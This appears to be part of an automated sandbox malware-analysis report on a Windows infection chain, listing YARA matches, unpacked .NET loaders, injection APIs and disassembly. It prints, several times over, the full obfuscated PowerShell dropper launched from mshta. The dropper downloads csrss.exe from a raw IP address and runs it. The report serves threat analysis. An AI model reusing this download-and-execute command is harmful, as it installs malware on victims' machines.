                  Source: Binary string: easinvoker.pdb source: csrss.exe, 0000000B.00000003.1352449792.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000B.00000002.1359633832.0000000002D30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: dajivhqI.pif, 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: csrss.exe, 0000000B.00000003.1352449792.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000B.00000003.1353349368.0000000000889000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000B.00000002.1359633832.0000000002D30000.00000004.00001000.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Links\dajivhqI.pifUnpacked PE file: 16.2.dajivhqI.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\user\Links\dajivhqI.pifUnpacked PE file: 16.2.dajivhqI.pif.400000.0.unpack
                  Source: Yara matchFile source: 11.2.csrss.exe.247e118.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.csrss.exe.247e118.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.csrss.exe.2e90000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.1358823987.000000000247E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 16.2.dajivhqI.pif.29915570.9.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
                  Source: 16.2.dajivhqI.pif.287c0000.5.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
                  Source: 16.2.dajivhqI.pif.28550a4e.3.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"Jump to behavior
                  Source: dajivhqI.pif.11.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.cmdline"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.cmdline"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA3E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,11_2_02EA3E20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_046B42D9 push ebx; ret 3_2_046B42DA
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9C2ED push 02E9C61Eh; ret 11_2_02E9C616
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9C2D5 push 02E9C61Eh; ret 11_2_02E9C616
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9C2A8 push 02E9C61Eh; ret 11_2_02E9C616
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9C2A1 push 02E9C61Eh; ret 11_2_02E9C616
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EB62A4 push 02EB630Fh; ret 11_2_02EB6307
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9C2BC push 02E9C61Eh; ret 11_2_02E9C616
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9C299 push 02E9C61Eh; ret 11_2_02E9C616
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9C291 push 02E9C61Eh; ret 11_2_02E9C616
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9C261 push 02E9C61Eh; ret 11_2_02E9C616
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9C204 push 02E9C61Eh; ret 11_2_02E9C616
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E93210 push eax; ret 11_2_02E9324C
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EB60AC push 02EB6125h; ret 11_2_02EB611D
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA606B push 02EA60A4h; ret 11_2_02EA609C
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA606C push 02EA60A4h; ret 11_2_02EA609C
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EAA018 push ecx; mov dword ptr [esp], edx11_2_02EAA01D
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EB61F8 push 02EB6288h; ret 11_2_02EB6280
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9617A push 02E961BEh; ret 11_2_02E961B6
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9617C push 02E961BEh; ret 11_2_02E961B6
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EB6144 push 02EB61ECh; ret 11_2_02EB61E4
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9F68F push 02E9F64Dh; ret 11_2_02E9F645
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9F600 push 02E9F64Dh; ret 11_2_02E9F645
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9F4F4 push 02E9F56Ah; ret 11_2_02E9F562
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9C498 push 02E9C61Eh; ret 11_2_02E9C616
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA2410 push ecx; mov dword ptr [esp], edx11_2_02EA2412
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9F5FF push 02E9F64Dh; ret 11_2_02E9F645
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EB5854 push 02EB5A3Ah; ret 11_2_02EB5A32
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA2EDA push 02EA2F87h; ret 11_2_02EA2F7F
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA2EDC push 02EA2F87h; ret 11_2_02EA2F7F
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9BE18 push ecx; mov dword ptr [esp], edx11_2_02E9BE1D
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA9FB4 push ecx; mov dword ptr [esp], edx11_2_02EA9FB9
                  Source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
